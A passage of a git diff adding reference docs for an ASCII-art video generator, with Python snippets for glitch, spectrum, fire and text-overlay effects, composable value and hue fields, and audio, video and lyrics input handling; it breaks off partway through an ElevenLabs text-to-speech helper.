+        shift = int((random.random()-0.5) * f.get("rms", 0.3)*40 + f.get("bdecay", 0)*20*(random.random()-0.5))
+        if shift != 0:
+            for row in range(h):
+                rr = y + row
+                if 0 <= rr < ch.shape[0]:
+                    ch[rr] = np.roll(ch[rr], shift)
+                    co[rr] = np.roll(co[rr], shift, axis=0)
+    return ch, co
+```
+
+### Block Corruption
+```python
+def eff_block_corrupt(ch, co, f, char_pool=None, count_base=20):
+    if char_pool is None:
+        char_pool = list(PAL_BLOCKS[4:] + PAL_KATA[2:8])
+    for _ in range(int(count_base + f.get("flux", 0.3)*60 + f.get("bdecay", 0)*40)):
+        bx = random.randint(0, max(1, ch.shape[1]-6))
+        by = random.randint(0, max(1, ch.shape[0]-4))
+        bw, bh = random.randint(2,6), random.randint(1,4)
+        block_char = random.choice(char_pool)
+        # Fill rectangle with single char and random color
+        for r in range(bh):
+            for c in range(bw):
+                rr, cc = by+r, bx+c
+                if 0 <= rr < ch.shape[0] and 0 <= cc < ch.shape[1]:
+                    ch[rr, cc] = block_char
+                    co[rr, cc] = (random.randint(100,255), random.randint(0,100), random.randint(0,80))
+    return ch, co
+```
+
+### Scan Bars (Vertical)
+```python
+def eff_scanbars(ch, co, f, t, n_base=4, chars="|\u2551|!1l"):
+    for bi in range(int(n_base + f.get("himid_r", 0.3)*12)):
+        sx = int((t*50*(1+bi*0.3) + bi*37) % ch.shape[1])
+        for rr in range(ch.shape[0]):
+            if random.random() < 0.7:
+                ch[rr, sx] = random.choice(chars)
+    return ch, co
+```
+
+### Error Messages
+```python
+# Parameterize the error vocabulary per project:
+ERRORS_TECH = ["SEGFAULT","0xDEADBEEF","BUFFER_OVERRUN","PANIC!","NULL_PTR",
+               "CORRUPT","SIGSEGV","ERR_OVERFLOW","STACK_SMASH","BAD_ALLOC"]
+ERRORS_COSMIC = ["VOID_BREACH","ENTROPY_MAX","SINGULARITY","DIMENSION_FAULT",
+                 "REALITY_ERR","TIME_PARADOX","DARK_MATTER_LEAK","QUANTUM_DECOHERE"]
+ERRORS_ORGANIC = ["CELL_DIVISION_ERR","DNA_MISMATCH","MUTATION_OVERFLOW",
+                  "NEURAL_DEADLOCK","SYNAPSE_TIMEOUT","MEMBRANE_BREACH"]
+```
+
+### Hex Data Stream
+```python
+hex_str = "".join(random.choice("0123456789ABCDEF") for _ in range(random.randint(8,20)))
+stamp(ch, co, hex_str, rand_row, rand_col, (0, 160, 80))
+```
+
+---
+
+## Spectrum / Visualization
+
+### Mirrored Spectrum Bars
+```python
+def eff_spectrum(g, f, t, n_bars=64, pal=PAL_BLOCKS, mirror=True):
+    bar_w = max(1, g.cols // n_bars); mid = g.rows // 2
+    band_vals = np.array([f.get("sub",0.3), f.get("bass",0.3), f.get("lomid",0.3),
+                          f.get("mid",0.3), f.get("himid",0.3), f.get("hi",0.3)])
+    ch = np.full((g.rows, g.cols), " ", dtype="U1")
+    co = np.zeros((g.rows, g.cols, 3), dtype=np.uint8)
+    for b in range(n_bars):
+        frac = b / n_bars
+        fi = frac * 5; lo_i = int(fi); hi_i = min(lo_i+1, 5)
+        bval = min(1, (band_vals[lo_i]*(1-fi%1) + band_vals[hi_i]*(fi%1)) * 1.8)
+        height = int(bval * (g.rows//2 - 2))
+        for dy in range(height):
+            hue = (f.get("cent",0.5)*0.3 + frac*0.3 + dy/max(height,1)*0.15) % 1.0
+            ci = pal[min(int(dy/max(height,1)*len(pal)*0.7+len(pal)*0.2), len(pal)-1)]
+            for dc in range(bar_w - (1 if bar_w > 2 else 0)):
+                cc = b*bar_w + dc
+                if 0 <= cc < g.cols:
+                    rows_to_draw = [mid - dy, mid + dy] if mirror else [g.rows - 1 - dy]
+                    for row in rows_to_draw:
+                        if 0 <= row < g.rows:
+                            ch[row, cc] = ci
+                            co[row, cc] = hsv_to_rgb_single(hue, 0.85, 0.5+dy/max(height,1)*0.5)
+    return ch, co
+```
+
+### Waveform
+```python
+def eff_waveform(g, f, t, row_offset=-5, hue=0.1):
+    ch = np.full((g.rows, g.cols), " ", dtype="U1")
+    co = np.zeros((g.rows, g.cols, 3), dtype=np.uint8)
+    for c in range(g.cols):
+        wv = (math.sin(c*0.15+t*5)*f.get("bass",0.3)*0.5
+            + math.sin(c*0.3+t*8)*f.get("mid",0.3)*0.3
+            + math.sin(c*0.6+t*12)*f.get("hi",0.3)*0.15)
+        wr = g.rows + row_offset + int(wv * 4)
+        if 0 <= wr < g.rows:
+            ch[wr, c] = "~"
+            v = int(120 + f.get("rms",0.3)*135)
+            co[wr, c] = [v, int(v*0.7), int(v*0.4)]
+    return ch, co
+```
+
+---
+
+## Fire / Lava
+
+### Fire Columns
+```python
+def eff_fire(g, f, t, n_base=20, hue_base=0.02, hue_range=0.12, pal=PAL_BLOCKS):
+    n_cols = int(n_base + f.get("bass",0.3)*30 + f.get("sub_r",0.3)*20)
+    ch = np.full((g.rows, g.cols), " ", dtype="U1")
+    co = np.zeros((g.rows, g.cols, 3), dtype=np.uint8)
+    for fi in range(n_cols):
+        fx_c = int((fi*g.cols/n_cols + np.sin(t*2+fi*0.7)*3) % g.cols)
+        height = int((f.get("bass",0.3)*0.4 + f.get("sub_r",0.3)*0.3 + f.get("rms",0.3)*0.3) * g.rows * 0.7)
+        for dy in range(min(height, g.rows)):
+            fr = g.rows - 1 - dy
+            frac = dy / max(height, 1)
+            bri = max(0.1, (1 - frac*0.6) * (0.5 + f.get("rms",0.3)*0.5))
+            hue = hue_base + frac * hue_range
+            ci = "\u2588" if frac<0.2 else ("\u2593" if frac<0.4 else ("\u2592" if frac<0.6 else "\u2591"))
+            ch[fr, fx_c] = ci
+            R, G, B = hsv2rgb_single(hue, 0.9, bri)
+            co[fr, fx_c] = (R, G, B)
+    return ch, co
+```
+
+### Ice / Cold Fire (same structure, different hue range)
+```python
+# hue_base=0.55, hue_range=0.15 -- blue to cyan
+# Lower intensity, slower movement
+```
+
+---
+
+## Text Overlays
+
+### Scrolling Ticker
+```python
+def eff_ticker(ch, co, t, text, row, speed=15, color=(80, 100, 140)):
+    off = int(t * speed) % max(len(text), 1)
+    doubled = text + "   " + text
+    stamp(ch, co, doubled[off:off+ch.shape[1]], row, 0, color)
+```
+
+### Beat-Triggered Words
+```python
+def eff_beat_words(ch, co, f, words, row_center=None, color=(255,240,220)):
+    if f.get("beat", 0) > 0:
+        w = random.choice(words)
+        r = (row_center or ch.shape[0]//2) + random.randint(-5,5)
+        stamp(ch, co, w, r, (ch.shape[1]-len(w))//2, color)
+```
+
+### Fading Message Sequence
+```python
+def eff_fading_messages(ch, co, t, elapsed, messages, period=4.0, color_base=(220,220,220)):
+    msg_idx = int(elapsed / period) % len(messages)
+    phase = elapsed % period
+    fade = max(0, min(1.0, phase) * min(1.0, period - phase))
+    if fade > 0.05:
+        v = fade
+        msg = messages[msg_idx]
+        cr, cg, cb = [int(c * v) for c in color_base]
+        stamp(ch, co, msg, ch.shape[0]//2, (ch.shape[1]-len(msg))//2, (cr, cg, cb))
+```
+
+---
+
+## Screen Shake
+Shift entire char/color arrays on beat:
+```python
+def eff_shake(ch, co, f, x_amp=6, y_amp=3):
+    shake_x = int(f.get("sub",0.3)*x_amp*(random.random()-0.5)*2 + f.get("bdecay",0)*4*(random.random()-0.5)*2)
+    shake_y = int(f.get("bass",0.3)*y_amp*(random.random()-0.5)*2)
+    if abs(shake_x) > 0:
+        ch = np.roll(ch, shake_x, axis=1)
+        co = np.roll(co, shake_x, axis=1)
+    if abs(shake_y) > 0:
+        ch = np.roll(ch, shake_y, axis=0)
+        co = np.roll(co, shake_y, axis=0)
+    return ch, co
+```
+
+---
+
+## Composable Effect System
+
+The real creative power comes from **composition**. There are three levels:
+
+### Level 1: Character-Level Layering
+
+Stack multiple effects as `(chars, colors)` layers:
+
+```python
+class LayerStack(EffectNode):
+    """Render effects bottom-to-top with character-level compositing."""
+    def add(self, effect, alpha=1.0):
+        """alpha < 1.0 = probabilistic override (sparse overlay)."""
+        self.layers.append((effect, alpha))
+
+# Usage:
+stack = LayerStack()
+stack.add(bg_effect)           # base — fills screen
+stack.add(main_effect)         # overlay on top (space chars = transparent)
+stack.add(particle_effect)     # sparse overlay on top of that
+ch, co = stack.render(g, f, t, S)
+```
+
+### Level 2: Pixel-Level Blending
+
+After rendering to canvases, blend with Photoshop-style modes:
+
+```python
+class PixelBlendStack:
+    """Stack canvases with blend modes for complex compositing."""
+    def add(self, canvas, mode="normal", opacity=1.0)
+    def composite(self) -> canvas
+
+# Usage:
+pbs = PixelBlendStack()
+pbs.add(canvas_a)                        # base
+pbs.add(canvas_b, "screen", 0.7)        # additive glow
+pbs.add(canvas_c, "difference", 0.5)    # psychedelic interference
+result = pbs.composite()
+```
+
+### Level 3: Temporal Feedback
+
+Feed previous frame back into current frame for recursive effects:
+
+```python
+fb = FeedbackBuffer()
+for each frame:
+    canvas = render_current()
+    canvas = fb.apply(canvas, decay=0.8, blend="screen",
+                      transform="zoom", transform_amt=0.015, hue_shift=0.02)
+```
+
+### Effect Nodes — Uniform Interface
+
+In the v2 protocol, effect nodes are used **inside** scene functions. The scene function itself returns a canvas. Effect nodes produce intermediate `(chars, colors)` that are rendered to canvas via the grid's `.render()` method or `_render_vf()`.
+
+```python
+class EffectNode:
+    def render(self, g, f, t, S) -> (chars, colors)
+
+# Concrete implementations:
+class ValueFieldEffect(EffectNode):
+    """Wraps a value field function + hue field function + palette."""
+    def __init__(self, val_fn, hue_fn, pal=PAL_DEFAULT, sat=0.7)
+
+class LambdaEffect(EffectNode):
+    """Wrap any (g,f,t,S) -> (ch,co) function."""
+    def __init__(self, fn)
+
+class ConditionalEffect(EffectNode):
+    """Switch effects based on audio features."""
+    def __init__(self, condition, if_true, if_false=None)
+```
+
+### Value Field Generators (Atomic Building Blocks)
+
+These produce float32 arrays `(rows, cols)` in range [0,1]. They are the raw visual patterns. All have signature `(g, f, t, S, **params) -> float32 array`.
+
+```python
+def vf_sinefield(g, f, t, S, bri=0.5,
+                 freq=(0.13, 0.17, 0.07, 0.09), speed=(0.5, -0.4, -0.3, 0.2)):
+    """Layered sine field. General purpose background/texture."""
+    v1 = np.sin(g.cc*freq[0] + t*speed[0]) * np.sin(g.rr*freq[1] - t*speed[1]) * 0.5 + 0.5
+    v2 = np.sin(g.cc*freq[2] - t*speed[2] + g.rr*freq[3]) * 0.4 + 0.5
+    v3 = np.sin(g.dist_n*5 + t*0.2) * 0.3 + 0.4
+    return np.clip((v1*0.35 + v2*0.35 + v3*0.3) * bri * (0.6 + f.get("rms",0.3)*0.6), 0, 1)
+
+def vf_smooth_noise(g, f, t, S, octaves=3, bri=0.5):
+    """Multi-octave sine approximation of Perlin noise."""
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(octaves):
+        freq = 0.05 * (2 ** i); amp = 0.5 / (i + 1)
+        phase = t * (0.3 + i * 0.2)
+        val = val + np.sin(g.cc*freq + phase) * np.cos(g.rr*freq*0.7 - phase*0.5) * amp
+    return np.clip(val * 0.5 + 0.5, 0, 1) * bri
+
+def vf_rings(g, f, t, S, n_base=6, spacing_base=4):
+    """Concentric rings, bass-driven count and wobble."""
+    n = int(n_base + f.get("sub_r",0.3)*25 + f.get("bass",0.3)*10)
+    sp = spacing_base + f.get("bass_r",0.3)*7 + f.get("rms",0.3)*3
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ri in range(n):
+        rad = (ri+1)*sp + f.get("bdecay",0)*15
+        wobble = f.get("mid_r",0.3)*5*np.sin(g.angle*3+t*4)
+        rd = np.abs(g.dist - rad - wobble)
+        th = 1 + f.get("sub",0.3)*3
+        val = np.maximum(val, np.clip((1 - rd/th) * (0.4 + f.get("bass",0.3)*0.8), 0, 1))
+    return val
+
+def vf_spiral(g, f, t, S, n_arms=3, tightness=2.5):
+    """Logarithmic spiral arms."""
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ai in range(n_arms):
+        offset = ai * 2*np.pi / n_arms
+        log_r = np.log(g.dist + 1) * tightness
+        arm_phase = g.angle + offset - log_r + t * 0.8
+        arm_val = np.clip(np.cos(arm_phase * n_arms) * 0.6 + 0.2, 0, 1)
+        arm_val *= (0.4 + f.get("rms",0.3)*0.6) * np.clip(1 - g.dist_n*0.5, 0.2, 1)
+        val = np.maximum(val, arm_val)
+    return val
+
+def vf_tunnel(g, f, t, S, speed=3.0, complexity=6):
+    """Tunnel depth effect — infinite zoom feeling."""
+    tunnel_d = 1.0 / (g.dist_n + 0.1)
+    v1 = np.sin(tunnel_d*2 - t*speed) * 0.45 + 0.55
+    v2 = np.sin(g.angle*complexity + tunnel_d*1.5 - t*2) * 0.35 + 0.55
+    return np.clip(v1*0.5 + v2*0.5, 0, 1)
+
+def vf_vortex(g, f, t, S, twist=3.0):
+    """Twisting radial pattern — distance modulates angle."""
+    twisted = g.angle + g.dist_n * twist * np.sin(t * 0.5)
+    val = np.sin(twisted * 4 - t * 2) * 0.5 + 0.5
+    return np.clip(val * (0.5 + f.get("bass",0.3)*0.8), 0, 1)
+
+def vf_interference(g, f, t, S, n_waves=6):
+    """Overlapping sine waves creating moire patterns."""
+    drivers = ["mid_r", "himid_r", "bass_r", "lomid_r", "hi_r", "sub_r"]
+    vals = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(min(n_waves, len(drivers))):
+        angle = i * np.pi / n_waves
+        freq = 0.06 + i * 0.03; sp = 0.5 + i * 0.3
+        proj = g.cc * np.cos(angle) + g.rr * np.sin(angle)
+        vals = vals + np.sin(proj*freq + t*sp) * f.get(drivers[i], 0.3) * 2.5
+    return np.clip(vals * 0.12 + 0.45, 0.1, 1)
+
+def vf_aurora(g, f, t, S, n_bands=3):
+    """Horizontal aurora bands."""
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(n_bands):
+        fr = 0.08 + i*0.04; fc = 0.012 + i*0.008
+        sr = 0.7 + i*0.3; sc = 0.18 + i*0.12
+        val = val + np.sin(g.rr*fr + t*sr) * np.sin(g.cc*fc + t*sc) * (0.6/n_bands)
+    return np.clip(val * (f.get("lomid_r",0.3)*3 + 0.2), 0, 0.7)
+
+def vf_ripple(g, f, t, S, sources=None, freq=0.3, damping=0.02):
+    """Concentric ripples from point sources."""
+    if sources is None: sources = [(0.5, 0.5)]
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ry, rx in sources:
+        dy = g.rr - g.rows*ry; dx = g.cc - g.cols*rx
+        d = np.sqrt(dy**2 + dx**2)
+        val = val + np.sin(d*freq - t*4) * np.exp(-d*damping) * 0.5
+    return np.clip(val + 0.5, 0, 1)
+
+def vf_plasma(g, f, t, S):
+    """Classic plasma: sum of sines at different orientations and speeds."""
+    v = np.sin(g.cc * 0.03 + t * 0.7) * 0.5
+    v = v + np.sin(g.rr * 0.04 - t * 0.5) * 0.4
+    v = v + np.sin((g.cc * 0.02 + g.rr * 0.03) + t * 0.3) * 0.3
+    v = v + np.sin(g.dist_n * 4 - t * 0.8) * 0.3
+    return np.clip(v * 0.5 + 0.5, 0, 1)
+
+def vf_diamond(g, f, t, S, freq=0.15):
+    """Diamond/checkerboard pattern."""
+    val = np.abs(np.sin(g.cc * freq + t * 0.5)) * np.abs(np.sin(g.rr * freq * 1.2 - t * 0.3))
+    return np.clip(val * (0.6 + f.get("rms",0.3)*0.8), 0, 1)
+
+def vf_noise_static(g, f, t, S, density=0.4):
+    """Random noise — different each frame. Non-deterministic."""
+    return np.random.random((g.rows, g.cols)).astype(np.float32) * density * (0.5 + f.get("rms",0.3)*0.5)
+```
+
+### Hue Field Generators (Color Mapping)
+
+These produce float32 hue arrays [0,1]. Independently combinable with any value field. Each is a factory returning a closure with signature `(g, f, t, S) -> float32 array`. Can also be a plain float for fixed hue.
+
+```python
+def hf_fixed(hue):
+    """Single hue everywhere."""
+    def fn(g, f, t, S):
+        return np.full((g.rows, g.cols), hue, dtype=np.float32)
+    return fn
+
+def hf_angle(offset=0.0):
+    """Hue mapped to angle from center — rainbow wheel."""
+    def fn(g, f, t, S):
+        return (g.angle / (2 * np.pi) + offset + t * 0.05) % 1.0
+    return fn
+
+def hf_distance(base=0.5, scale=0.02):
+    """Hue mapped to distance from center."""
+    def fn(g, f, t, S):
+        return (base + g.dist * scale + t * 0.03) % 1.0
+    return fn
+
+def hf_time_cycle(speed=0.1):
+    """Hue cycles uniformly over time."""
+    def fn(g, f, t, S):
+        return np.full((g.rows, g.cols), (t * speed) % 1.0, dtype=np.float32)
+    return fn
+
+def hf_audio_cent():
+    """Hue follows spectral centroid — timbral color shifting."""
+    def fn(g, f, t, S):
+        return np.full((g.rows, g.cols), f.get("cent", 0.5) * 0.3, dtype=np.float32)
+    return fn
+
+def hf_gradient_h(start=0.0, end=1.0):
+    """Left-to-right hue gradient."""
+    def fn(g, f, t, S):
+        h = np.broadcast_to(
+            start + (g.cc / g.cols) * (end - start),
+            (g.rows, g.cols)
+        ).copy()  # .copy() is CRITICAL — see troubleshooting.md
+        return h % 1.0
+    return fn
+
+def hf_gradient_v(start=0.0, end=1.0):
+    """Top-to-bottom hue gradient."""
+    def fn(g, f, t, S):
+        h = np.broadcast_to(
+            start + (g.rr / g.rows) * (end - start),
+            (g.rows, g.cols)
+        ).copy()
+        return h % 1.0
+    return fn
+
+def hf_plasma(speed=0.3):
+    """Plasma-style hue field — organic color variation."""
+    def fn(g, f, t, S):
+        return (np.sin(g.cc*0.02 + t*speed)*0.5 + np.sin(g.rr*0.015 + t*speed*0.7)*0.5) % 1.0
+    return fn
+```
+
+### Combining Value Fields
+
+The combinatorial explosion comes from mixing value fields with math:
+
+```python
+# Multiplication = intersection (only shows where both have brightness)
+combined = vf_plasma(g,f,t,S) * vf_vortex(g,f,t,S)
+
+# Addition = union (shows both, clips at 1.0)
+combined = np.clip(vf_rings(g,f,t,S) + vf_spiral(g,f,t,S), 0, 1)
+
+# Interference = beat pattern (shows XOR-like patterns)
+combined = np.abs(vf_plasma(g,f,t,S) - vf_tunnel(g,f,t,S))
+
+# Modulation = one effect shapes the other
+combined = vf_rings(g,f,t,S) * (0.3 + 0.7 * vf_plasma(g,f,t,S))
+
+# Maximum = shows the brightest of two effects
+combined = np.maximum(vf_spiral(g,f,t,S), vf_aurora(g,f,t,S))
+```
+
+### Full Scene Example (v2 — Canvas Return)
+
+A v2 scene function composes effects internally and returns a pixel canvas:
+
+```python
+def scene_complex(r, f, t, S):
+    """v2 scene function: returns canvas (uint8 H,W,3).
+    r = Renderer, f = audio features, t = time, S = persistent state dict."""
+    g = r.grids["md"]
+    rows, cols = g.rows, g.cols
+    
+    # 1. Value field composition
+    plasma = vf_plasma(g, f, t, S)
+    vortex = vf_vortex(g, f, t, S, twist=4.0)
+    combined = np.clip(plasma * 0.6 + vortex * 0.5 + plasma * vortex * 0.4, 0, 1)
+    
+    # 2. Color from hue field
+    h = (hf_angle(0.3)(g,f,t,S) * 0.5 + hf_time_cycle(0.08)(g,f,t,S) * 0.5) % 1.0
+    
+    # 3. Render to canvas via _render_vf helper
+    canvas = _render_vf(g, combined, h, sat=0.75, pal=PAL_DENSE)
+    
+    # 4. Optional: blend a second layer
+    overlay = _render_vf(r.grids["sm"], vf_rings(r.grids["sm"],f,t,S),
+                         hf_fixed(0.6)(r.grids["sm"],f,t,S), pal=PAL_BLOCK)
+    canvas = blend_canvas(canvas, overlay, "screen", 0.4)
+    
+    return canvas
+    
+# In the render_clip() loop (handled by the framework):
+# canvas = scene_fn(r, f, t, S)
+# canvas = tonemap(canvas, gamma=scene_gamma)
+# canvas = feedback.apply(canvas, ...)
+# canvas = shader_chain.apply(canvas, f=f, t=t)
+# pipe.stdin.write(canvas.tobytes())
+```
+
+Vary the **value field combo**, **hue field**, **palette**, **blend modes**, **feedback config**, and **shader chain** per section for maximum visual variety. With 12 value fields × 8 hue fields × 14 palettes × 20 blend modes × 7 feedback transforms × 38 shaders, the combinations are effectively infinite.
diff --git a/skills/creative/ascii-video/references/inputs.md b/skills/creative/ascii-video/references/inputs.md
new file mode 100644
index 00000000..2dabc400
--- /dev/null
+++ b/skills/creative/ascii-video/references/inputs.md
@@ -0,0 +1,407 @@
+# Input Sources
+
+## Audio Analysis
+
+### Loading
+
+```python
+tmp = tempfile.mktemp(suffix=".wav")
+subprocess.run(["ffmpeg", "-y", "-i", input_path, "-ac", "1", "-ar", "22050",
+                "-sample_fmt", "s16", tmp], capture_output=True, check=True)
+with wave.open(tmp) as wf:
+    sr = wf.getframerate()
+    raw = wf.readframes(wf.getnframes())
+samples = np.frombuffer(raw, dtype=np.int16).astype(np.float32) / 32768.0
+```
+
+### Per-Frame FFT
+
+```python
+hop = sr // fps          # samples per frame
+win = hop * 2            # analysis window (2x hop for overlap)
+window = np.hanning(win)
+freqs = rfftfreq(win, 1.0 / sr)
+
+bands = {
+    "sub":   (freqs >= 20)  & (freqs < 80),
+    "bass":  (freqs >= 80)  & (freqs < 250),
+    "lomid": (freqs >= 250) & (freqs < 500),
+    "mid":   (freqs >= 500) & (freqs < 2000),
+    "himid": (freqs >= 2000)& (freqs < 6000),
+    "hi":    (freqs >= 6000),
+}
+```
+
+For each frame: extract chunk, apply window, FFT, compute band energies.
+
+### Feature Set
+
+| Feature | Formula | Controls |
+|---------|---------|----------|
+| `rms` | `sqrt(mean(chunk²))` | Overall loudness/energy |
+| `sub`..`hi` | `sqrt(mean(band_magnitudes²))` | Per-band energy |
+| `centroid` | `sum(freq*mag) / sum(mag)` | Brightness/timbre |
+| `flatness` | `geomean(mag) / mean(mag)` | Noise vs tone |
+| `flux` | `sum(max(0, mag - prev_mag))` | Transient strength |
+| `sub_r`..`hi_r` | `band / sum(all_bands)` | Spectral shape (volume-independent) |
+| `cent_d` | `abs(gradient(centroid))` | Timbral change rate |
+| `beat` | Flux peak detection | Binary beat onset |
+| `bdecay` | Exponential decay from beats | Smooth beat pulse (0→1→0) |
+
+**Band ratios are critical** — they decouple spectral shape from volume, so a quiet bass section and a loud bass section both read as "bassy" rather than just "loud" vs "quiet".
+
+### Smoothing
+
+EMA prevents visual jitter:
+
+```python
+def ema(arr, alpha):
+    out = np.empty_like(arr); out[0] = arr[0]
+    for i in range(1, len(arr)):
+        out[i] = alpha * arr[i] + (1 - alpha) * out[i-1]
+    return out
+
+# Slow-moving features (alpha=0.12): centroid, flatness, band ratios, cent_d
+# Fast-moving features (alpha=0.3): rms, flux, raw bands
+```
+
+### Beat Detection
+
+```python
+flux_smooth = np.convolve(flux, np.ones(5)/5, mode="same")
+peaks, _ = signal.find_peaks(flux_smooth, height=0.15, distance=fps//5, prominence=0.05)
+
+beat = np.zeros(n_frames)
+bdecay = np.zeros(n_frames, dtype=np.float32)
+for p in peaks:
+    beat[p] = 1.0
+    for d in range(fps // 2):
+        if p + d < n_frames:
+            bdecay[p + d] = max(bdecay[p + d], math.exp(-d * 2.5 / (fps // 2)))
+```
+
+`bdecay` gives smooth 0→1→0 pulse per beat, decaying over ~0.5s. Use for flash/glitch/mirror triggers.
+
+### Normalization
+
+After computing all frames, normalize each feature to 0-1:
+
+```python
+for k in features:
+    a = features[k]
+    lo, hi = a.min(), a.max()
+    features[k] = (a - lo) / (hi - lo + 1e-10)
+```
+
+## Video Sampling
+
+### Frame Extraction
+
+```python
+# Method 1: ffmpeg pipe (memory efficient)
+cmd = ["ffmpeg", "-i", input_video, "-f", "rawvideo", "-pix_fmt", "rgb24",
+       "-s", f"{target_w}x{target_h}", "-r", str(fps), "-"]
+pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
+frame_size = target_w * target_h * 3
+for fi in range(n_frames):
+    raw = pipe.stdout.read(frame_size)
+    if len(raw) < frame_size: break
+    frame = np.frombuffer(raw, dtype=np.uint8).reshape(target_h, target_w, 3)
+    # process frame...
+
+# Method 2: OpenCV (if available)
+cap = cv2.VideoCapture(input_video)
+```
+
+### Luminance-to-Character Mapping
+
+Convert video pixels to ASCII characters based on brightness:
+
+```python
+def frame_to_ascii(frame_rgb, grid, pal=PAL_DEFAULT):
+    """Convert video frame to character + color arrays."""
+    rows, cols = grid.rows, grid.cols
+    # Resize frame to grid dimensions
+    small = np.array(Image.fromarray(frame_rgb).resize((cols, rows), Image.LANCZOS))
+    # Luminance
+    lum = (0.299 * small[:,:,0] + 0.587 * small[:,:,1] + 0.114 * small[:,:,2]) / 255.0
+    # Map to chars
+    chars = val2char(lum, lum > 0.02, pal)
+    # Colors: use source pixel colors, scaled by luminance for visibility
+    colors = np.clip(small * np.clip(lum[:,:,None] * 1.5 + 0.3, 0.3, 1), 0, 255).astype(np.uint8)
+    return chars, colors
+```
+
+### Edge-Weighted Character Mapping
+
+Use edge detection for more detail in contour regions:
+
+```python
+def frame_to_ascii_edges(frame_rgb, grid, pal=PAL_DEFAULT, edge_pal=PAL_BOX):
+    gray = np.mean(frame_rgb, axis=2)
+    small_gray = resize(gray, (grid.rows, grid.cols))
+    lum = small_gray / 255.0
+
+    # Sobel edge detection
+    gx = np.abs(small_gray[:, 2:] - small_gray[:, :-2])
+    gy = np.abs(small_gray[2:, :] - small_gray[:-2, :])
+    edge = np.zeros_like(small_gray)
+    edge[:, 1:-1] += gx; edge[1:-1, :] += gy
+    edge = np.clip(edge / edge.max(), 0, 1)
+
+    # Edge regions get box drawing chars, flat regions get brightness chars
+    is_edge = edge > 0.15
+    chars = val2char(lum, lum > 0.02, pal)
+    edge_chars = val2char(edge, is_edge, edge_pal)
+    chars[is_edge] = edge_chars[is_edge]
+
+    return chars, colors
+```
+
+### Motion Detection
+
+Detect pixel changes between frames for motion-reactive effects:
+
+```python
+prev_frame = None
+def compute_motion(frame):
+    global prev_frame
+    if prev_frame is None:
+        prev_frame = frame.astype(np.float32)
+        return np.zeros(frame.shape[:2])
+    diff = np.abs(frame.astype(np.float32) - prev_frame).mean(axis=2)
+    prev_frame = frame.astype(np.float32) * 0.7 + prev_frame * 0.3  # smoothed
+    return np.clip(diff / 30.0, 0, 1)  # normalized motion map
+```
+
+Use motion map to drive particle emission, glitch intensity, or character density.
+
+### Video Feature Extraction
+
+Per-frame features analogous to audio features, for driving effects:
+
+```python
+def analyze_video_frame(frame_rgb):
+    gray = np.mean(frame_rgb, axis=2)
+    return {
+        "brightness": gray.mean() / 255.0,
+        "contrast": gray.std() / 128.0,
+        "edge_density": compute_edge_density(gray),
+        "motion": compute_motion(frame_rgb).mean(),
+        "dominant_hue": compute_dominant_hue(frame_rgb),
+        "color_variance": compute_color_variance(frame_rgb),
+    }
+```
+
+## Image Sequence
+
+### Static Image to ASCII
+
+Same as single video frame conversion. For animated sequences:
+
+```python
+import glob
+frames = sorted(glob.glob("frames/*.png"))
+for fi, path in enumerate(frames):
+    img = np.array(Image.open(path).resize((VW, VH)))
+    chars, colors = frame_to_ascii(img, grid, pal)
+```
+
+### Image as Texture Source
+
+Use an image as a background texture that effects modulate:
+
+```python
+def load_texture(path, grid):
+    img = np.array(Image.open(path).resize((grid.cols, grid.rows)))
+    lum = np.mean(img, axis=2) / 255.0
+    return lum, img  # luminance for char mapping, RGB for colors
+```
+
+## Text / Lyrics
+
+### SRT Parsing
+
+```python
+import re
+def parse_srt(path):
+    """Returns [(start_sec, end_sec, text), ...]"""
+    entries = []
+    with open(path) as f:
+        content = f.read()
+    blocks = content.strip().split("\n\n")
+    for block in blocks:
+        lines = block.strip().split("\n")
+        if len(lines) >= 3:
+            times = lines[1]
+            m = re.match(r"(\d+):(\d+):(\d+),(\d+) --> (\d+):(\d+):(\d+),(\d+)", times)
+            if m:
+                g = [int(x) for x in m.groups()]
+                start = g[0]*3600 + g[1]*60 + g[2] + g[3]/1000
+                end = g[4]*3600 + g[5]*60 + g[6] + g[7]/1000
+                text = " ".join(lines[2:])
+                entries.append((start, end, text))
+    return entries
+```
+
+### Lyrics Display Modes
+
+- **Typewriter**: characters appear left-to-right over the time window
+- **Fade-in**: whole line fades from dark to bright
+- **Flash**: appear instantly on beat, fade out
+- **Scatter**: characters start at random positions, converge to final position
+- **Wave**: text follows a sine wave path
+
+```python
+def lyrics_typewriter(ch, co, text, row, col, t, t_start, t_end, color):
+    """Reveal characters progressively over time window."""
+    progress = np.clip((t - t_start) / (t_end - t_start), 0, 1)
+    n_visible = int(len(text) * progress)
+    stamp(ch, co, text[:n_visible], row, col, color)
+```
+
+## Generative (No Input)
+
+For pure generative ASCII art, the "features" dict is synthesized from time:
+
+```python
+def synthetic_features(t, bpm=120):
+    """Generate audio-like features from time alone."""
+    beat_period = 60.0 / bpm
+    beat_phase = (t % beat_period) / beat_period
+    return {
+        "rms": 0.5 + 0.3 * math.sin(t * 0.5),
+        "bass": 0.5 + 0.4 * math.sin(t * 2 * math.pi / beat_period),
+        "sub": 0.3 + 0.3 * math.sin(t * 0.8),
+        "mid": 0.4 + 0.3 * math.sin(t * 1.3),
+        "hi": 0.3 + 0.2 * math.sin(t * 2.1),
+        "cent": 0.5 + 0.2 * math.sin(t * 0.3),
+        "flat": 0.4,
+        "flux": 0.3 + 0.2 * math.sin(t * 3),
+        "beat": 1.0 if beat_phase < 0.05 else 0.0,
+        "bdecay": max(0, 1.0 - beat_phase * 4),
+        # ratios
+        "sub_r": 0.2, "bass_r": 0.25, "lomid_r": 0.15,
+        "mid_r": 0.2, "himid_r": 0.12, "hi_r": 0.08,
+        "cent_d": 0.1,
+    }
+```
+
+## TTS Integration
+
+For narrated videos (testimonials, quotes, storytelling), generate speech audio per segment and mix with background music.
+
+### ElevenLabs Voice Generation
+
+```python
+import requests
+
+def generate_tts(text, voice_id, api_key, output_path, model="eleven_multilingual_v2"):
+    """Generate TTS audio via ElevenLabs API."""
+    url = f"https://api.elevenlabs.io/v1/text-to-speech/{voice_id}"
